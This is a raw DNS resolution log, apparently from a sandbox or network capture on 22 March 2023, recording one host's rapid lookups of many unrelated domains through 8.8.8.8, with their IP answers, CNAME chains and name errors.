                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.502628088 CET8.8.8.8192.168.2.50x8933No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.518815041 CET8.8.8.8192.168.2.50x6797No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.547489882 CET8.8.8.8192.168.2.50x92cNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.547489882 CET8.8.8.8192.168.2.50x92cNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.575551987 CET8.8.8.8192.168.2.50xd718No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.677627087 CET8.8.8.8192.168.2.50x6f19No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.686831951 CET8.8.8.8192.168.2.50x1479No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.686831951 CET8.8.8.8192.168.2.50x1479No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.727921009 CET8.8.8.8192.168.2.50x1f92No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.807260036 CET8.8.8.8192.168.2.50x473dNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.807260036 CET8.8.8.8192.168.2.50x473dNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.811338902 CET8.8.8.8192.168.2.50xbaa2Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.817646980 CET8.8.8.8192.168.2.50x4d34No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.890151024 CET8.8.8.8192.168.2.50x9bd6No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.891463995 CET8.8.8.8192.168.2.50x3953Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.023145914 CET8.8.8.8192.168.2.50x80d3No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.023145914 CET8.8.8.8192.168.2.50x80d3No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.026838064 CET8.8.8.8192.168.2.50x3ee2No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.026859999 CET8.8.8.8192.168.2.50x3563No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.026859999 CET8.8.8.8192.168.2.50x3563No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.133915901 CET8.8.8.8192.168.2.50x4110Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.395128012 CET8.8.8.8192.168.2.50x44bcNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.569293022 CET8.8.8.8192.168.2.50x61b4No error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.590827942 CET8.8.8.8192.168.2.50x5bd9No error (0)mjrcpas.com154.81.136.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.695926905 CET8.8.8.8192.168.2.50x1438No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.744932890 CET8.8.8.8192.168.2.50xf029No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.746978045 CET8.8.8.8192.168.2.50x3278No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.766552925 CET8.8.8.8192.168.2.50x454dNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.776747942 CET8.8.8.8192.168.2.50x8224No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.790288925 CET8.8.8.8192.168.2.50xa34cNo error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.790288925 CET8.8.8.8192.168.2.50xa34cNo error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.799680948 CET8.8.8.8192.168.2.50xf388No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.811738968 CET8.8.8.8192.168.2.50x707cNo error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.839701891 CET8.8.8.8192.168.2.50x166No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.839701891 CET8.8.8.8192.168.2.50x166No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.883932114 CET8.8.8.8192.168.2.50xfe80No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.976840019 CET8.8.8.8192.168.2.50xd4cNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.977190018 CET8.8.8.8192.168.2.50x2f17No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:00.983452082 CET8.8.8.8192.168.2.50xdcbcNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.130220890 CET8.8.8.8192.168.2.50x14cdNo error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.130220890 CET8.8.8.8192.168.2.50x14cdNo error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.132327080 CET8.8.8.8192.168.2.50x295dNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.179013014 CET8.8.8.8192.168.2.50xef7dNo error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.180574894 CET8.8.8.8192.168.2.50x35b5No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.220505953 CET8.8.8.8192.168.2.50xda3fNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.234321117 CET8.8.8.8192.168.2.50xfb01No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.318378925 CET8.8.8.8192.168.2.50x95efNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.418193102 CET8.8.8.8192.168.2.50x824aNo error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.461545944 CET8.8.8.8192.168.2.50xb578No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.674676895 CET8.8.8.8192.168.2.50x6ab4No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.674676895 CET8.8.8.8192.168.2.50x6ab4No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.733634949 CET8.8.8.8192.168.2.50xfcecNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.733634949 CET8.8.8.8192.168.2.50xfcecNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.733634949 CET8.8.8.8192.168.2.50xfcecNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.733634949 CET8.8.8.8192.168.2.50xfcecNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.733755112 CET8.8.8.8192.168.2.50xd046No error (0)cjcagent.com157.112.187.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.755337000 CET8.8.8.8192.168.2.50xb6ffNo error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.800033092 CET8.8.8.8192.168.2.50xaf48No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.826877117 CET8.8.8.8192.168.2.50xefc5No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.861821890 CET8.8.8.8192.168.2.50x9ba9No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.861821890 CET8.8.8.8192.168.2.50x9ba9No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.861821890 CET8.8.8.8192.168.2.50x9ba9No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.862763882 CET8.8.8.8192.168.2.50x6901No error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.862763882 CET8.8.8.8192.168.2.50x6901No error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.899699926 CET8.8.8.8192.168.2.50x9d93No error (0)rast.se89.221.250.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.912386894 CET8.8.8.8192.168.2.50x334bNo error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.940501928 CET8.8.8.8192.168.2.50x2055No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.967428923 CET8.8.8.8192.168.2.50xe598No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.967446089 CET8.8.8.8192.168.2.50xb543No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.004400969 CET8.8.8.8192.168.2.50x7b93Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.051137924 CET8.8.8.8192.168.2.50x95b0No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.062083960 CET8.8.8.8192.168.2.50xbeffNo error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.068669081 CET8.8.8.8192.168.2.50x81f6Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.069394112 CET8.8.8.8192.168.2.50x674bNo error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.075752974 CET8.8.8.8192.168.2.50xe5b6No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.098026991 CET8.8.8.8192.168.2.50xfa1cNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.104788065 CET8.8.8.8192.168.2.50xc76cName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.148881912 CET8.8.8.8192.168.2.50x156aNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.148881912 CET8.8.8.8192.168.2.50x156aNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.175332069 CET8.8.8.8192.168.2.50xd261Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.190256119 CET8.8.8.8192.168.2.50xac65No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.190256119 CET8.8.8.8192.168.2.50xac65No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.190256119 CET8.8.8.8192.168.2.50xac65No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.225775957 CET8.8.8.8192.168.2.50x86b8Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.227835894 CET8.8.8.8192.168.2.50xf25eNo error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.242999077 CET8.8.8.8192.168.2.50xfb84No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.242999077 CET8.8.8.8192.168.2.50xfb84No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.242999077 CET8.8.8.8192.168.2.50xfb84No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.242999077 CET8.8.8.8192.168.2.50xfb84No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.253561974 CET8.8.8.8192.168.2.50x5a01No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.278630972 CET8.8.8.8192.168.2.50xbe46Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.279793978 CET8.8.8.8192.168.2.50x7058No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.282393932 CET8.8.8.8192.168.2.50xb0dbNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.302272081 CET8.8.8.8192.168.2.50x964Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.318018913 CET8.8.8.8192.168.2.50x328dNo error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.318018913 CET8.8.8.8192.168.2.50x328dNo error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.318018913 CET8.8.8.8192.168.2.50x328dNo error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.318018913 CET8.8.8.8192.168.2.50x328dNo error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.395454884 CET8.8.8.8192.168.2.50x5b00No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.432693005 CET8.8.8.8192.168.2.50x5cbNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.474466085 CET8.8.8.8192.168.2.50x98b3Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.498178005 CET8.8.8.8192.168.2.50x3629No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.522835970 CET8.8.8.8192.168.2.50x3ffcNo error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.522835970 CET8.8.8.8192.168.2.50x3ffcNo error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.526804924 CET8.8.8.8192.168.2.50xecaName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.538403034 CET8.8.8.8192.168.2.50x51e5No error (0)workplus.hu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.538403034 CET8.8.8.8192.168.2.50x51e5No error (0)workplus.hu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.544146061 CET8.8.8.8192.168.2.50xcfbfServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.555191994 CET8.8.8.8192.168.2.50x9befServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.570095062 CET8.8.8.8192.168.2.50x105dName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.572423935 CET8.8.8.8192.168.2.50x86d5No error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.591308117 CET8.8.8.8192.168.2.50x6785Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.604760885 CET8.8.8.8192.168.2.50xa6baNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.604760885 CET8.8.8.8192.168.2.50xa6baNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.649701118 CET8.8.8.8192.168.2.50x3882No error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.671710968 CET8.8.8.8192.168.2.50x9a2aNo error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.783830881 CET8.8.8.8192.168.2.50xbca1No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.794286013 CET8.8.8.8192.168.2.50x13a0No error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.794286013 CET8.8.8.8192.168.2.50x13a0No error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.814158916 CET8.8.8.8192.168.2.50xc2cdNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.836025000 CET8.8.8.8192.168.2.50x434fNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.836025000 CET8.8.8.8192.168.2.50x434fNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.837898970 CET8.8.8.8192.168.2.50xad01No error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.865397930 CET8.8.8.8192.168.2.50x372bNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.892874956 CET8.8.8.8192.168.2.50xc080No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.892874956 CET8.8.8.8192.168.2.50xc080No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.945875883 CET8.8.8.8192.168.2.50x19baNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.945875883 CET8.8.8.8192.168.2.50x19baNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.945875883 CET8.8.8.8192.168.2.50x19baNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.945875883 CET8.8.8.8192.168.2.50x19baNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.017407894 CET8.8.8.8192.168.2.50x3dc5No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.020643950 CET8.8.8.8192.168.2.50x1833No error (0)assideum.com52.219.94.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.042458057 CET8.8.8.8192.168.2.50x676eNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.042458057 CET8.8.8.8192.168.2.50x676eNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.042458057 CET8.8.8.8192.168.2.50x676eNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.042458057 CET8.8.8.8192.168.2.50x676eNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.152967930 CET8.8.8.8192.168.2.50x394dNo error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.152967930 CET8.8.8.8192.168.2.50x394dNo error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.162273884 CET8.8.8.8192.168.2.50x4e1eNo error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.163954020 CET8.8.8.8192.168.2.50x59caNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.172921896 CET8.8.8.8192.168.2.50xfa06No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.188896894 CET8.8.8.8192.168.2.50xaf91No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.188896894 CET8.8.8.8192.168.2.50xaf91No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.221112967 CET8.8.8.8192.168.2.50x4139No error (0)araax.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.221112967 CET8.8.8.8192.168.2.50x4139No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.221112967 CET8.8.8.8192.168.2.50x4139No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.221112967 CET8.8.8.8192.168.2.50x4139No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.320672035 CET8.8.8.8192.168.2.50x4e3No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.325545073 CET8.8.8.8192.168.2.50x41b5No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.337029934 CET8.8.8.8192.168.2.50xc621No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.337029934 CET8.8.8.8192.168.2.50xc621No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.358629942 CET8.8.8.8192.168.2.50xc64dNo error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.361820936 CET8.8.8.8192.168.2.50x10afNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.366858006 CET8.8.8.8192.168.2.50x1536No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.414824963 CET8.8.8.8192.168.2.50xcc10No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.414824963 CET8.8.8.8192.168.2.50xcc10No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.420965910 CET8.8.8.8192.168.2.50x8213No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.429934025 CET8.8.8.8192.168.2.50x5edeNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.456136942 CET8.8.8.8192.168.2.50x5dc2Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
